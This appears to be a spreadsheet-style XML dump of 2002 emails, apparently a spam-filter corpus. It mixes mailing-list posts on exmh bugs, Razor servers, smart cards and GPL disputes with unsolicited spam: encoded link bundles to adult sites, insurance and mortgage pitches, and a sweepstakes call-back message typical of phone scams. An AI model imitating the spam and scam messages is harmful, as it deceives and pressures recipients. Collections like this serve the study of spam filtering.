 Link[1] Discuss[2] (_Thanks, Paul!_)
 [1] http://www.javawalk.com/javawalk.html
 [2] http://www.quicktopic.com/boing/H/hgG7TyTTrKj
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_2018282504P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-bcc@DeepEddy.Com&gt;
 &gt; Date:  Mon, 23 Sep 2002 09:41:22 -0500
 &gt;
 &gt; &gt; From:  Scott Lipcon &lt;slipcon@mercea.net&gt;
 &gt; &gt; Date:  Sun, 22 Sep 2002 22:58:16 -0400
 &gt; &gt;
 &gt; &gt; I just updated to the latest CVS - I had been running a build from June. 
 &gt;  
 &gt; &gt; Hitting the Flist button gives the following traceback:
 &gt; &gt; 
 &gt; &gt; syntax error in expression "int(17+1+(222-)*(19-17-2)/(224-))"
 &gt; &gt;     while executing
 &gt; &gt; "expr int($minLine+1+($msgid-$minMsg)*($maxLine-$minLine-2)/($maxMsg-$minMs
 &gt; &gt; g))"
 &gt; &gt;     (procedure "Ftoc_FindMsg" line 57)
 &gt; &gt;     invoked from within
 &gt; &gt; "Ftoc_FindMsg $i"
 &gt; &gt;     (procedure "Ftoc_ShowSequences" line 16)
 &gt; &gt;     invoked from within
 &gt; &gt; "Ftoc_ShowSequences $F"
 &gt; &gt;     (procedure "ScanFolder" line 81)
 &gt; &gt;     invoked from within
 &gt; &gt; "ScanFolder inbox 0"
 &gt; &gt;     invoked from within
 &gt; &gt; "time [list ScanFolder $F $adjustDisplay"
 &gt; &gt;     (procedure "Scan_Folder" line 2)
 &gt; &gt;     invoked from within
 &gt; &gt; "Scan_Folder $exmh(folder) $ftoc(showNew)"
 &gt; &gt;     (procedure "Inc_PresortFinish" line 7)
 &gt; &gt;     invoked from within
 &gt; &gt; "Inc_PresortFinish"
 &gt; &gt;     invoked from within
 &gt; &gt; ".fops.flist invoke"
 &gt; &gt;     ("uplevel" body line 1)
 &gt; &gt;     invoked from within
 &gt; &gt; "uplevel #0 [list $w invoke]"
 &gt; &gt;     (procedure "tkButtonUp" line 7)
 &gt; &gt;     invoked from within
 &gt; &gt; "tkButtonUp .fops.flist
 &gt; &gt; "
 &gt; &gt;     (command bound to event)
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; It seems to only happen in a folder with no unseen messages.
 &gt; &gt; 
 &gt; &gt; Chris, is this related to your recent changes?
 &gt; 
 &gt; Curious.  I changed the arguments to Ftoc_ShowSequences to drop the folder 
 &gt; argument and instead have an optional msgids argument.  Somehow your version 
 &gt; of ScanFolder is still trying to pass $F.  You seem to have the latest 
 &gt; ftoc.tcl (1.36), but not the latest scan.tcl (1.27).
 &gt; 
 &gt; I don't know how that happened, but try getting your source tree completely 
 &gt; up to date.
 Actually, I take that back.  You're not running the latest ftoc.tcl either.
 It probably is my bug, but it's in code that's been changed since you last 
 updated from CVS (Saturday), so please update and let's see if the problem is 
 still there.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_2018282504P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9jywkK9b4h5R0IUIRAooIAJ4yCHFQ22/6OBD61tWNbb2sScOxPwCdGYE+
 cVdYZOjdN7A/nWpRHqusbJo=
 =AZsA
 -----END PGP SIGNATURE-----
 --==_Exmh_2018282504P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: nice foto YOHvTp2KSxRjQIzJXdHxkRTfBjhO
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_dD40Vgw1oCGOp3EPEdazdG
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_dD40Vgw1oCGOp3EPEdazdGAA"
 ------=_NextPart_dD40Vgw1oCGOp3EPEdazdGAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGEgaHJlZj1odHRwOi8vaGxjLm5vLWlwLm9yZz4NCjxpbWcgc3JjPWh0dHA6Ly9obGMubm8taXAu
 b3JnL2NuZ2lmL3lpZGlhbjIuZ2lmIGFsdD1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi95aWRp
 YW4yLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwczovL2JuYm4yMDAwLmRuczJnby5jb20+DQo8
 aW1nIHNyYz1odHRwOi8vd3d3MzAuYnJpbmtzdGVyLmNvbS9jbnNwcmluZy9saWtlL2JpZy5naWYg
 YWx0PWh0dHA6Ly93d3czMC5icmlua3N0ZXIuY29tL2Nuc3ByaW5nL2JpZy5naWY+DQo8L2E+DQoN
 CjxhIGhyZWY9aHR0cDovL2ZvcmV2ZXJzcC5ob3B0by5vcmcvemlyZWFsPg0KPGltZyBzcmM9aHR0
 cDovL3d3dzI2LmJyaW5rc3Rlci5jb20vc3ByaW5nY24vbGlrZS90aWFuYW5tZW4uanBnIGFsdD1o
 dHRwOi8vd3d3MjYuYnJpbmtzdGVyLmNvbS9zcHJpbmdjbi9saWtlL3RpYW5hbm1lbi5qcGc+DQo8
 L2E+DQoNCjxhIGhyZWY9aHR0cDovL2V4YW0uaG9wdG8ub3JnL3ppcmVhbD4NCjxpbWcgc3JjPWh0
 dHA6Ly9wdWR1amlzaS50cmlwb2QuY29tL2xpa2UveHVlYW4uZ2lmIGFsdD1odHRwOi8vcHVkdWpp
 c2kudHJpcG9kLmNvbS9saWtlL3h1ZWFuLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwOi8vcm9j
 aW82My5ob3B0by5vcmcvZmxhc2g+DQo8aW1nIHNyYz1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdp
 Zi9hbGxhY2NlcHQuanBnIGFsdD1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi9hbGxhY2NlcHQu
 anBnPg0KPC9hPg0KDQo8YSBocmVmPWh0dHA6Ly9leGFtLmhvcHRvLm9yZy9zZWU+DQo8aW1nIHNy
 Yz1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi9zaG91amllLmpwZyBhbHQ9aHR0cDovL2hsYy5u
 by1pcC5vcmcvY25naWYvc2hvdWppZS5qcGc+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cHM6Ly90a3Rr
 LnN5dGVzLm5ldD4NCjxpbWcgc3JjPWh0dHA6Ly9mbGRmaXNnb29kLnRyaXBvZC5jb20vbGlrZS90
 YWl3YW4uZ2lmIGFsdD1odHRwOi8vZmxkZmlzZ29vZC50cmlwb2QuY29tL2xpa2UvdGFpd2FuLmdp
 Zj4NCjwvYT4=
 ------=_NextPart_dD40Vgw1oCGOp3EPEdazdGAA--
 ------=_NextPart_dD40Vgw1oCGOp3EPEdazdG--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [scoop] Liseli kayit
</t>
  </si>
  <si>
    <t xml:space="preserve">PEhUTUw+PEhFQUQ+PFRJVExFPkV2IHlhcGltaSBhbWF09nIgdmlkZW9sYXIgdHFka3FqZG5s
 IDwvVElUTEU+PC9IRUFEPjxCT0RZPg0KPERJViBBTElHTj0iY2VudGVyIj48VEFCTEUgYm9y
 ZGVyPTAgY2VsbFBhZGRpbmc9MCBjZWxsU3BhY2luZz0wIHdpZHRoPTYwMD4NCiAgPFRCT0RZ
 Pg0KICA8VFI+DQogICAgPFREIGNvbFNwYW49Mz4NCiAgICAgIDxQIGFsaWduPWNlbnRlcj4m
 bmJzcDs8L1A+DQogICAgICA8UCBhbGlnbj1jZW50ZXI+PEZPTlQgZmFjZT1WZXJkYW5hPjxC
 PlllbmkgVmlkZW9sYXIgRWtsZW5kaTs8L0I+PC9GT05UPjwvUD4NCiAgICAgIDxVTD4NCiAg
 ICAgICAgPExJPg0KICAgICAgICA8UCBhbGlnbj1jZW50ZXI+PEZPTlQgZmFjZT1WZXJkYW5h
 PjxCPjxBIEhSRUY9Imh0dHA6Ly93d3cuc2Vrc2xpc2VzaS5jb20iPis1NjAgYWRldCB2aWRl
 byA6IDM4IHRhbmVzaSBFdiANCiAgICAgICAgeWFwaW1pPC9BPjwvQj48L0ZPTlQ+PC9QPg0K
 ICAgICAgICA8TEk+DQogICAgICAgIDxQIGFsaWduPWNlbnRlcj48Rk9OVCBmYWNlPVZlcmRh
 bmE+PEI+PEEgSFJFRj0iaHR0cDovL3d3dy5zZWtzbGlzZXNpLmNvbSI+MTIwIEFkZXQgSGlr
 YXllPC9BPjwvQj48L0ZPTlQ+PC9QPg0KICAgICAgICA8TEk+DQogICAgICAgIDxQIGFsaWdu
 PWNlbnRlcj48Rk9OVCBmYWNlPVZlcmRhbmE+PEI+PEEgSFJFRj0iaHR0cDovL3d3dy5zZWtz
 bGlzZXNpLmNvbSI+S2FkaW5sYXJpbiBPcmdhem0gDQpWaWRlb2xhcmk8L0E+PC9CPjwvRk9O
 VD48L1A+DQogICAgICAgIDxMST4NCiAgICAgICAgPFAgYWxpZ249Y2VudGVyPjxGT05UIGZh
 Y2U9VmVyZGFuYT48Qj48QSBIUkVGPSJodHRwOi8vd3d3LnNla3NsaXNlc2kuY29tIj5EZXZv
 biB2ZSBTeWx2aWEgU2FpbnRpbiANCiAgICAgICAgVmlkZW9sYXJpLNxubPxsZXI8L0E+PC9C
 PjwvRk9OVD48L1A+DQogICAgICAgIDxMST4NCiAgICAgICAgPFAgYWxpZ249Y2VudGVyPjxG
 T05UIGZhY2U9VmVyZGFuYT48Qj48QSBIUkVGPSJodHRwOi8vd3d3LnNla3NsaXNlc2kuY29t
 Ij41IEFkZXQgQWR1bHQgQm91bmNlciBTaWZyZSAoMjcwMEdCIA0KICAgICAgICBGaWxtKTwv
 QT48L0I+PC9GT05UPjwvUD4NCiAgICAgICAgPExJPg0KICAgICAgICA8UCBhbGlnbj1jZW50
 ZXI+PEZPTlQgZmFjZT1WZXJkYW5hPjxCPjxBIEhSRUY9Imh0dHA6Ly93d3cuc2Vrc2xpc2Vz
 aS5jb20iPkZsYXNoIFBvcm5vIFZpZGVvbGFyLCAgSGVyc2V5IA0KYnVyYWRhPC9BPjwvQj48
 L0ZPTlQ+PC9QPjwvTEk+PC9VTD4NCiAgICAgIDxQIGFsaWduPWNlbnRlcj48Qj4mbmJzcDs8
 L0I+PC9QPg0KICAgICAgPFAgYWxpZ249Y2VudGVyPjxTVFJPTkc+Jm5ic3A7PEZPTlQgY29s
 b3I9I2ZmMDAwMD5GaWxtbGVyaW4gYm95dXRsYXJpIGtpc2Egb2xkdWd1bmRhbiBoaXpsaSBk
 b3dubG9hZDxCUj4NCgkgIDxBIEhSRUY9Imh0dHA6Ly93d3cuc2Vrc2xpc2VzaS5jb20iPjxG
 T05UIEZBQ0U9IlZlcmRhbmEsIEFyaWFsIiBTSVpFPSszIA0KQ09MT1I9IiNGRjAwRkYiPjxC
 Pnd3dy5TZWtzTGlzZXNpLmNvbTwvQj48L0ZPTlQ+PC9BPjwvRk9OVD48L1NUUk9ORz48L1A+
 PC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT48L0RJVj4NCjwvQk9EWT48L0hUTUw+DQo=
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "Great FREE Offers!" naaqd
</t>
  </si>
  <si>
    <t xml:space="preserve">Lower your mortgage rate and/or payment! FREE Quote!
 http://hey11.heyyy.com/freeservices/mortgage/
 Extend your car's warranty! Even older cars. 
 Save 40-60% off regular price! FREE Quote!
 http://hey11.heyyy.com/freeservices/warranty/
 Life Insurance -- just pennies a day! FREE Quote!
 You can save BIG here!
 http://hey11.heyyy.com/freeservices/termquote/
 Top Drawer Lawyers -- working for YOU! Just pennies a day. 
 Find out more for FREE!
 http://hey11.heyyy.com/freeservices/legalservices/
 ==============================================
 To unsubscribe, use the link below.
 http://hey11.heyyy.com/removal/remove.htm
 Allow 72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm still seeing this.  It reports to honor.cloudmark.com but checks
 against apt.cloudmark.com.  What is the sync delay between these boxes?
 -----Original Message-----
 From: Rose, Bobby 
 Sent: Monday, August 05, 2002 2:05 PM
 To: ML-razor-users
 Subject: [Razor-users] What's wrong with the Razor servers now?
 I noticed a low count of razor'd spam messages. So after digging, if I
 razor-report a message the diags say that it was accepted but if I turn
 around and run a check on the exact same message that was reported, then
 it doesn't find the sig and as such isn't spam.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: It's real important that you call...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We have been trying to reach you!
 It's real important that you call 
 regarding your Sweepstakes Entry!
 1-800-401-4948
 Thanks,
 Angie Taylor
 Call Mon-Fri 9:30am-3:30pm EST @ 1-800-401-4948
 **Available for U.S. residents only.**
 1-800-401-4948
 To be removed from this mailing reply to
 mailto:angie_pepi@runbox.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Webdev] site monitroring service?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0032_01C24778.16FE3000
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Hi,
 I wonder could anyone reccommend a good
 website monitoring service-with sms alerts.
 thx and sorry to be OT.
 Adrian Murphy
 2020 Strategies
 Beechlawn
 Cloncrane
 Clonbullogue
 Co Offaly
 Ireland
 ------=_NextPart_000_0032_01C24778.16FE3000
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Hi,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;I wonder could anyone reccommend a=20
 good&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;website monitoring service-with sms=20
 alerts.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;thx and sorry to be OT.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Adrian Murphy&lt;BR&gt;2020=20
 Strategies&lt;BR&gt;Beechlawn&lt;BR&gt;Cloncrane&lt;BR&gt;Clonbullogue&lt;BR&gt;Co=20
 Offaly&lt;BR&gt;Ireland&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0032_01C24778.16FE3000--
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 19:26, Rick Moen wrote:
 &gt; NON-freely redistributable apps (in boxed sets):
 &gt; -----------------------------------------------
 &gt; SAP database
 The same one as provided on www.sapdb.org? 
 Which is released under the GPL/LGPL?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IP: The FCC NPRM  on the Broadcast Flag
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Delivered-To: ip-sub-1-outgoing@admin.listbox.com
 Delivered-To: ip-sub-1@majordomo.pobox.com
 User-Agent: Microsoft-Entourage/10.1.0.2006
 Date: Sat, 17 Aug 2002 21:27:04 -0400
 Subject: IP: The FCC NPRM  on the Broadcast Flag
 From: Dave Farber &lt;dave@farber.net&gt;
 To: ip &lt;ip-sub-1@majordomo.pobox.com&gt;
 Sender: owner-ip-sub-1@admin.listbox.com
 Reply-To: farber@cis.upenn.edu
 I am in data gathering mode preparatory to writing a response to the FCC
 NPRM on the Digital Broadcast flag. While I was at the FCC I had a set of
 opportunities to hear out the media companies about that and I was
 unconvinced then that it was a good idea. I am more convinced now that it is
 not wise.
 I am interested in Ipers opinions on this -- for and against and will share
 the responses when I digest them.  (as well as credit the ideas in the
 response (with or without attribution -- your call)).
 Dave
 For archives see:
 http://www.interesting-people.org/archives/interesting-people/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</si>
  <si>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Subject: Hype is all for tired old Panorama
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572785,215/
 Date: 2002-10-05T03:05:34+01:00
 *Sport: *BBC Panorama programme, The Corruption of Racing, reveals little that 
 is new, writes *Greg Wood*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Microsoft buys XDegress - more of a p2p/distributed data thing...
</t>
  </si>
  <si>
    <t xml:space="preserve">I like this part - sounds like httpd on the client...
 http://www.openp2p.com/pub/a/p2p/2001/04/27/xdegrees.html
 "Once the Client Component is installed, a server can order a program to run
 on the client. Any CGI script, Java servlet, ASP component, etc. could be
 run on the client. This is like breaking the Web server into two parts.
 Originally, Web servers just understood HTTP and sent pages. Then the field
 started demanding more from the Web and the servers got loaded down with CGI
 and mod_perl and active pages and stuff. So now the Web server can choose to
 go back to simple serving and (where the application is appropriate) let the
 client do the other razzamatazz. This is superior to JavaScript in one
 important detail: the program doesn't have to reload when a new page is
 loaded, as JavaScript functions do.
 And because XDegrees uses Web-compatible technology, users can access
 XDegrees resources without installing any software, simply by using their
 browser."
 ===
 "Scaling is the main question that comes to mind when somebody describes a
 new naming and searching system. CEO Michael Tanne claims to have figured
 out mathematically that the system can scale up to millions of users and
 billions of resources. Scaling is facilitated by the careful location of
 servers (XDegrees will colocate servers at key routing points, as Akamai
 does), and by directing clients to the nearest server as their default
 "home" server. Enterprise customers can use own servers to manage in-house
 applications."
 "Files can be cached on multiple systems randomly scattered around the
 Internet, as with Napster or Freenet. In fact, the caching in XDegrees is
 more sophisticated than it is on those systems: users with high bandwidth
 connections can download portions, or "stripes," of a file from several
 cached locations simultaneously. The XDegrees software then reassembles
 these stripes into the whole file and uses digital signatures to verify that
 the downloaded file is the same as the original. A key component of this
 digital signature is a digest of the file, which is stored as an HTTP header
 for the file."
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jesse wrote :
 &gt; Oh yeah, I was following this thread in the sylpheed-claws list.  Very
 &gt; interesting stuff.  I might have to stick w/ 0.8.2 until aspell gets
 &gt; updated in Red Hat.
 Then this may be 6 months or more since my guess after 3 beta releases is
 that the freeze on package versions for inclusion in the next stable
 release (n+1) has already happened, thus you'll have to wait at least for
 Red Hat Linux... n+2 :-)
 This is why (if it doesn't break anything), I'll maybe release recent
 aspell packages. But to be sure I'll need to do some testing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</si>
  <si>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Want help with your debt? [aiqjz]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: Questions on miscellaneous errata and issues
</t>
  </si>
  <si>
    <t xml:space="preserve">On 12/08/02 22:38 -0400, Sven wrote:
 ) 
 ) &gt;   The timeout is hardcoded to 15 secs.
 ) &gt;   No plans right now to make that an option.
 ) &gt;   You can always edit the source - Core.pm.  :)
 ) 
   Correction - It is 15 secs for read/write, 
   but 20 secs for initial connect.
 ) In looking at Core.pm I find a couple possible places where that code might
 ) be. Is it:
   So if you want to adjust the initial connect timeout, 
   edit Core.pm:1622 in version 2.14
   For reads and writes, lines 1463, 1481.
 ) &gt;   The system is designed so servers can be added and
 ) &gt;   subtracted without the clients caring - if the razor
 ) &gt;   client can't connect to a server, it re-discovers, getting
 ) &gt;   all currently available servers and stores results locally.
 ) &gt;
 ) 
 ) I changed the default discovery period to every 12 hours in order to
 ) compensate for the recent sporadic nature of the servers' availability (I
 ) realize that the issue was related to syncing and server upgrades .... but I
 ) might as well play it safe for a while).
   If a server is taken out the clients will connect, fail, re-discover 
   automatically, save results, and continue to use the other servers.
   You don't *need* to change anything, it will all work out. 
 ) &gt;   We are looking into releasing caching catalogue servers
 ) &gt;   for those besides us to use.
 ) 
 ) If I can be of help or if you have details about to participate in this
 ) portion (caching or catalogueing), please let me know.
   ok, thanks.
   -chad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</si>
  <si>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Feedback from my posting about FogBUGZ Setup fell into four
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021008.html
 Date: Not supplied
 Feedback from my posting[1] about FogBUGZ[2] Setup fell into four categories. 
 *"Why make Setup reversable? Instead you should collect all the information 
 from the user and make all the changes in one batch at the end."* There are a 
 couple of things to understand here. First of all, even if you do everything in 
 one batch at the end, there's always a possibility that some step in the middle 
 of the batch will fail, and in that case, a well-behaved setup program will 
 back out the steps that were already done. There are well over 100 error 
 messages in the string table for FogBUGZ Setup so the number of things that can 
 fail is not insignificant. 
 Second, it's not nice to tell people about an error in their input three pages 
 after they made the mistake. For example, early in the FogBUGZ setup process we 
 prompt you to create an account for FogBUGZ to use: 
 [IMG: http://www.joelonsoftware.com/pictures/setupNewAcct.gif (FogBUGZ Setup 
 Screenshot)] 
 The account creation could fail for a myriad of reasons, none of which can be 
 predicted before trying to create the account. For example, the password might 
 not conform to the system password policy. And different national versions of 
 Windows NT have different rules about accented letters in passwords (betcha 
 didn't know that!). It's better to tell the user about this problem right away 
 so they can correct their input rather than having a message come up during the 
 long install process later, forcing the user to back up and fix it. And even if 
 you force the user to back up and fix it, you still have to undo the first part 
 of the work that you did before creating the account, otherwise you've left 
 their system in an indeterminate state. 
 In any case I need to write code to create the account and delete the account 
 in case something later fails; I might as well call that code on this page of 
 the wizard where I can display a useful error message. 
 And what are the kinds of things that need to be reversable? Well, in order to 
 upgrade FogBUGZ without requiring a reboot (and we _never, ever _require a 
 reboot), we have to shut down a couple of processes that might have been 
 keeping FogBUGZ files pinned down, such as IIS (Microsoft's web server). So 
 part one of the batch is "Stop IIS." Now if part 2 fails for some reason, it 
 would be _extremely_ rude to leave IIS not running. And anyway, it's not like I 
 don't need to write the code for "Start IIS" for the end of the batch. So the 
 code to rollback "Stop IIS" is already written. No big deal, I just need to 
 call it at the right place. 
 I think one reason that people think you should "gather all the info and then 
 do all the work" is because with very large installation programs that are very 
 slow, this is a polite way to waste less of the user's time. Indeed even 
 FogBUGZ setup does 95% of its work at the very end. But the "create account" 
 operation is so fast, that principle simply doesn't apply here. Even our 95% of 
 the work phase takes well under a minute, most of which is spent waiting for 
 IIS to stop and start. 
 *"Why did you use VC++/MFC? Surely an advanced intelligence such as yourself 
 has admitted by now that Delphi[3] is more productive."* First of all, leave 
 your language religious fanaticism at the Usenet door. Somehow I managed 
 to figure out_ in high school_ that language advocacy and religious 
 arguments are unbelievably boring.  
 Secondly, even if Delphi were more productive, the only pertinent question, 
 since I am writing the code, is _what is more productive for Joel Spolsky_. And 
 I don't know Delphi at all, but I know Win32, MFC, and VC++ _really, really 
 well_. So while I might not outcode a good Delphi programmer, I would 
 definitely outcode a completely inexperienced Delphi programmer (which is me), 
 certainly over a short 4 week project. Third, many of the things I needed to do 
 in this setup program are things like "grant the Logon as Service privilege to 
 an account." This is rare enough that the only way to find out how to do this 
 is to search the Microsoft knowlege base and the web in general. When you 
 search the web in general for how to do fancy things with Windows NT, what you 
 find is about 75% C code, maybe 20% VB code, and 5% everything else. Yes, I 
 know, I could translate the C code into Delphi (assuming I was a sophisticated 
 Delphi programmer, not a completely inexperienced Delphi programmer), but that 
 costs as much productivity as I would supposedly gain from your supposedly more 
 productive programming language. And fourth, I already had about 30% of the 
 code I needed for Setup in MFC format: from FogBUGZ 2.0 Setup, and a library 
 I've been using for years to make wizards. 
 *"Why make Setup at all? You already have your customers' money. Good Setup 
 programs don't increase sales."* This was actually the smartest question and 
 made me think the hardest. I came up with three reasons: 
 - Decreased tech support cost. This setup program will pay for itself over the 
 life of the code. 
 - Delight my customers. When I'm trying to get them to upgrade to 4.0, I want 
 them to remember how painless the 3.0 installation was, so they won't hesitate 
 because they are afraid to upgrade. I'm still using an old version of 
 SpamAssassin that is becoming increasingly ineffective, even though I know the 
 new version is much better, because I just can't bear the thought of another 
 morning wasted. The very memory of the first SpamAssassin installation -- all 
 the little SSH windows, some su'ed, trying to scroll through man pages and 
 Google Groups, accidentally hitting Ctrl+Z in Emacs to undo and having it 
 suspend, trying to guess why we can't get the MTA to run procmail, sorry it's 
 too much. If SpamAssassin was making money off of upgraders they would have 
 lost my business because they don't have a SETUP program. 
 - Win reviews. Software reviewers always cast about for some kind of 
 standardized way to rate software, even when they are comparing apples and 
 oranges and planets and 17th century philosophers. They always have a 
 meaningless list of things to review which can be applied to PC games, 
 mainframe databases, web site auction software, and DNA sequencing 
 software. And Setup is always on their list. A single flaw in setup is 
 guaranteed to be mentioned in every review because every reviewer will see it 
 and say "Aha!"
 *"How can we make WISE[4] better?" *Kudos to the product manager of WISE 
 Installation System for calling me up and listening to my litany of all the 
 reasons his product wasn't adequate for typical IIS/ASP/SQL applications.
 [1] http://www.joelonsoftware.com/news/20021002.html
 [2] http://www.fogcreek.com/FogBUGZ
 [3] http://discuss.fogcreek.com/delphiquestions
 [4] http://www.wise.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday 19 September 2002 16:44, Michael McKay wrote:
 &gt; On Tue, Sep 03, 2002 at 09:03:40PM -0400, Yannick Gingras wrote:
 &gt; &gt; This make me wonder about the relative protection of smart cards.
 &gt; They have an internal procession unit around 4MHz.  Can we consider them as
 &gt; trusted hardware ?
 SmartCards do not have fixed clock rates (more often than not) as the ISO spec 
 dictates that they are externally powered and clocked, but SmartCards used 
 for security purposes (usually JavaCards) have built-in crypto co-processors 
 that make clock rate irrelevant. 4mhz SmartCards can often preform triple-DES 
 faster than general purpose processors clocked at ten times the speed.
 That said, clock rate has nothing with how trustworthy a card is. As Michael 
 pointed out, there's something of an arms-race between manufacturers and 
 attackers which has nothing to do with clock rate, and time and time again 
 what we've seen is that it's not a question of "is it secure", it's a 
 question of "who is it secure from and for how long?" Security is rarely a 
 question of absolutes (despite the often boolean nature of a break), rather 
 it's a question of assessing, quantifying, and managing risk. SmartCards are 
 designed to address threats in which the cost of protection cannot exceed the 
 $1-20 range (depending on the application).
 As whether or not they are "trusted hardware", the question again revolves 
 around attacker and timeframe. One might expect a bored undergrad EE student 
 to have more trouble revealing the contents of a pilfered smartcard than, 
 say, a governtment intelligence service. If your goal is to keep undergrad 
 EEs from perpetrating mass fraud in the caffeteria, then a smartcard is 
 likely "trustworthy" enough for your application. If your aim is to protect 
 ICBM launch codes, then it's probably the wrong tool. In either application, 
 a risk/cost ratio must justify the use of the protection measure in question.
 -- 
 Alex Russell
 alex@SecurePipe.com
 alex@netWindows.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Lowest life insurance rates available!                                                   acedl
</t>
  </si>
  <si>
    <t xml:space="preserve">Lowest rates available for term life insurance! Take a moment and fill out our online form to see the low rate you qualify for. Save up to 70% from regular rates! Smokers accepted! http://www3.all-savings.com/termlife/ 
 Representing quality nationwide carriers. Act now!
 ---------------------------------------
 To unsubscribe, go to: 
 http://www3.all-savings.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GPL limits put to a test
</t>
  </si>
  <si>
    <t xml:space="preserve">
 XviD [1] is a project to make GPL divx codecs. Sigma Designs [1] is a
 company  looking to put out hardware to playback, amongst other things,
 divx files. Problem is Sigma is using XviDs gpled code in ways not very
 gpl. The  results....XviD stops work on thier code and ask the users to
 put preasure  on Sigma to honor the GPL.
 Some notes from other places....
 &gt;&gt;From Doom9 [3]
 "XviD development has been stopped! The Sigma Designs REALMagic MPEG-4
 Video Codec contains wide portions of code taken from the XviD project.
 Soon after the initial release of the REALMagic codec the XviD developers
 have contacted Sigma and informed them about the GPL violation (for those
 who don't know, XviD is distributed under the GNU Public License - GPL -
 which demands that if you modify a GPL program you have to release it
 under the GPL, which in this case means that the source code of the Sigma
 codec must be freely available). Sigma promised to replace the stolen
 code, but the new version of the codec which was released this month only
 disguises the stolen code, it was not actually removed. Sigma was once
 again contacted and asked to remove the offending code but until today
 nothing has happened. Therefore the XviD team is now turning to the public
 in the hope to receive wide public support in their efforts to convince
 Sigma Designs to respect the terms of the GPL. And until the matter has
 been resolved XviD development will not continue.
 That being said I hope all the forum members who saw their threads about
 the Sigma Codecs being closed will understand our motivation now.
 Internally we already knew what was going on but since the XviD authors
 first wanted to try and resolve this internally we respected their wishes
 and kept quiet about the matter at hand.
